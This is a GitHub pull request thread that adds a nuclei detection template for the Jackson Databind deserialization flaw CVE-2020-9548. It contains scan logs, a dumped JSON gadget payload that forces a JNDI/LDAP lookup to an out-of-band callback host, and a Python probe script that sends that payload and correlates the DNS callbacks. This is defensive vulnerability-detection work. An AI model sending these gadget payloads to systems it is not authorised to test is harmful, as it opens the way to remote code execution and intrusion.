@tomaquet18 (Contributor) commented Jun 27, 2025

Template / PR Information

  • Added CVE-2020-9548 detection template
  • This template identifies unsafe deserialization in Jackson Databind via the AnterosDBCPConfig class, which can lead to Remote Code Execution (RCE) when enableDefaultTyping is enabled.
  • Detection is performed using an Out-of-Band (OOB) DNS-based interaction with Interactsh.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details

  • This template is designed to safely detect the potential vulnerability using a DNS-based interaction (ldap://{{interactsh-url}}).
  • ⚠️ It does not attempt RCE exploitation, because achieving full RCE would require:
    • A rogue JNDI/LDAP server to serve a malicious serialized payload.
  • The matcher uses internal: true to avoid duplicate results (e.g., A/AAAA queries).
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[INF] [CVE-2020-9548] Dumped HTTP request for http://192.168.31.165:8080/vuln

POST /vuln HTTP/1.1
Host: 192.168.31.165:8080
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 143
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

[
  "br.com.anteros.dbcp.AnterosDBCPConfig",
  {
    "healthCheckRegistry": "ldap://d1fj2foa7o4eeb02vnt07ujc651p4g1o4.oast.online"
  }
]
[D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4] Received DNS interaction from 149.102.236.197 at 2025-06-28 00:03:13
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 48609
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine. IN       AAAA



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 48609
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine. IN       AAAA

;; ANSWER SECTION:
D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine.  3600    IN      A       167.99.69.236

;; AUTHORITY SECTION:
D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine.  3600    IN      NS      ns1.oast.online.
D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine.  3600    IN      NS      ns2.oast.online.

;; ADDITIONAL SECTION:
ns1.oast.online.        3600    IN      A       167.99.69.236
ns2.oast.online.        3600    IN      A       167.99.69.236


[CVE-2020-9548:word-1] [http] [critical] http://192.168.31.165:8080/vuln
[WRN] [CVE-2020-9548] Could not execute step on http://192.168.31.165:8080/vuln: [:RUNTIME] got following errors while executing flow <- [:RUNTIME] failed to execute http:1 protocol <- cause="net/http: timeout awaiting response headers" chain="got err while executing http://192.168.31.165:8080/vuln"
[INF] Scan completed in 28.839129915s. 1 matches found.

I'm using a VPN, so that's not my real IP ☝️

/claim #12484

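As an added, stand-alone illustration of the check this template performs (it is not the PR's template and not nuclei code), the Python below builds the same WRAPPER_ARRAY payload the dumped request shows, posts it, and then correlates callback log lines against the probe token. Two details from the output above are handled on purpose: the target can hang inside the JNDI lookup (the "timeout awaiting response headers" warning), so a read timeout is reported as the probe having been delivered rather than as an error; and the resolver returned the token with randomized case (D1fj2fOA7O4... for the lowercase d1fj2foa7o4... that was sent), so matching is case-folded and repeated A/AAAA hits are collapsed to one result, which is what the internal: true matcher is there for. The target URL, the callback domain, the locally generated token and the sample log lines are all constructed for the example; in real use the token and the log come from the Interactsh client.

```python
"""Stand-alone OOB probe for the Jackson polymorphic-typing pattern used in the
PR (added example; not the nuclei template itself). Network calls only happen
when run from the command line; the helper functions are pure and testable."""
import json
import re
import secrets
import socket
import sys
import urllib.error
import urllib.request

GADGET_CLASS = "br.com.anteros.dbcp.AnterosDBCPConfig"

# Mirrors the "[<id>] Received DNS interaction from <ip> at <ts>" lines in the PR output.
INTERACTION_RE = re.compile(
    r"^\[(?P<id>[A-Za-z0-9]+)\]\s+Received\s+(?P<proto>[A-Z]+)\s+interaction\s+from\s+(?P<src>\S+)"
)


def new_token(nbytes: int = 16) -> str:
    """Per-probe token used as the callback subdomain (lowercase hex, 32 chars).
    Stand-in for the id an Interactsh client would hand out (assumption for the example)."""
    return secrets.token_hex(nbytes)


def build_payload(callback_host: str) -> str:
    """WRAPPER_ARRAY polymorphic form ["<class>", {<properties>}], the shape Jackson
    accepts when default typing is enabled; healthCheckRegistry carries the JNDI URL."""
    return json.dumps(
        [GADGET_CLASS, {"healthCheckRegistry": f"ldap://{callback_host}"}], indent=2
    )


def send_probe(target_url: str, payload: str, timeout: float = 10.0) -> str:
    """POST the payload. A read timeout counts as 'delivered' because a vulnerable
    target blocks inside the JNDI lookup instead of answering."""
    req = urllib.request.Request(
        target_url,
        data=payload.encode(),
        method="POST",
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return f"delivered: http {resp.status}"
    except urllib.error.HTTPError as exc:  # 4xx/5xx still means the body was parsed
        return f"delivered: http {exc.code}"
    except (TimeoutError, socket.timeout):  # request sent, no response headers
        return "delivered: no response before timeout (JNDI lookup likely blocking)"
    except urllib.error.URLError as exc:  # raised while connecting/sending
        if isinstance(exc.reason, (TimeoutError, socket.timeout)):
            return "not delivered: connect timeout"
        return f"not delivered: {exc.reason}"


def correlate(token: str, log_lines) -> list:
    """Return [(proto, src_ip), ...] for interactions tagged with `token`.
    Comparison is case-folded: resolvers may randomise the query name's case
    (0x20 encoding), so the logged id can differ in case from what was sent.
    Duplicate hits (e.g. separate A and AAAA lookups) collapse to one entry."""
    wanted = token.casefold()
    seen, hits = set(), []
    for line in log_lines:
        m = INTERACTION_RE.match(line.strip())
        if not m or m.group("id").casefold() != wanted:
            continue
        key = (m.group("proto"), m.group("src"))
        if key not in seen:
            seen.add(key)
            hits.append(key)
    return hits


# Constructed sample log, modelled on the interaction lines in the PR output.
SAMPLE_LOG = """\
[D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4] Received DNS interaction from 149.102.236.197 at 2025-06-28 00:03:13
[D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4] Received DNS interaction from 149.102.236.197 at 2025-06-28 00:03:13
[zz9unrelatedprobe0000000000000000] Received DNS interaction from 198.51.100.7 at 2025-06-28 00:03:20
"""

if __name__ == "__main__":
    # usage: python probe.py http://target:8080/vuln <callback-domain>   (both constructed)
    if len(sys.argv) != 3:
        print(__doc__)
        sys.exit(2)
    token = new_token()
    payload = build_payload(f"{token}.{sys.argv[2]}")
    print(payload)
    print(send_probe(sys.argv[1], payload))
    print("then run correlate(token, log_lines) over the callback log; token =", token)
```

The correlation step is the part a template's matcher has to get right: match on the token alone, case-insensitively, and report once per target, which is the role of the internal: true matcher described in the PR.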

@princechaddha (Member)

Automated PR Review (Experimental)

Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes

  • Fix the name field to follow the format: <Vendor> <Product> <Version> - <Vulnerability Class>. It should be formatted as FasterXML Jackson Databind <=2.9.10.4 - Remote Code Execution.
  • Add the remediation section to provide guidance on how to mitigate the vulnerability.

Other Suggestions

  • Consider verifying that the verified field is set to true once you've confirmed functionality and testing against the vulnerability.
  • Ensure that interactsh-url is properly set up in the request to avoid issues in actual exploitation scenarios.
  • Review the matchers and consider adding more to minimize false positives if applicable.

Note: I am an AI Template bot, which is still experimental, and the team will review the PR shortly.

@DhiyaneshGeek (Member)

Hi @tomaquet18

Thanks for sharing the template

Is it possible to share the vulnerable set-up details or debug information to [email protected]?

@tomaquet18 (Contributor, Author)

Hi @DhiyaneshGeek,

Thanks for the feedback. I've just sent the vulnerable setup to [email protected] as requested.

Also, regarding the use of {{BaseURL}}: in this case, the vulnerability may reside in a specific endpoint (e.g., /vuln), so replacing it with {{Hostname}} would not preserve the intended request path. Using {{BaseURL}} ensures the request is correctly formed and targets the vulnerable route.

Let me know if you need anything else.

@DhiyaneshGeek (Member)

Hello tomaquet18,

Thank you for sharing the detailed vulnerable setup for the CVE-2020-9548 template. I can confirm that we were able to successfully validate the template using the environment you provided.

We appreciate your thoroughness in including the Docker setup, source code, instructions, and the README.md file. This greatly assisted us in verifying and replicating the issue.


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

		projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2020-9548] FasterXML Jackson Databind <=2.9.10.4 - Remote Code Execution (@tomaquet18) [critical]
[INF] Using Interactsh Server: oast.fun
[CVE-2020-9548] [http] [critical] http://0.0.0.0:8082/vuln
[INF] Scan completed in 6.087807042s. 1 matches found.

@DhiyaneshGeek added the "Done Ready to merge" label on Jul 9, 2025
@pussycat0x merged commit 3e215a7 into projectdiscovery:main on Jul 10, 2025
3 checks passed
@tomaquet18 (Contributor, Author) commented Jul 11, 2025

Hi @DhiyaneshGeek,

Thank you for the validation and kind feedback!

I'm glad the provided environment was helpful. Let me know if there's anything else I should adjust or improve in the template.

Labels: 🙋 Bounty claim, Done Ready to merge, good first issue (Good for newcomers)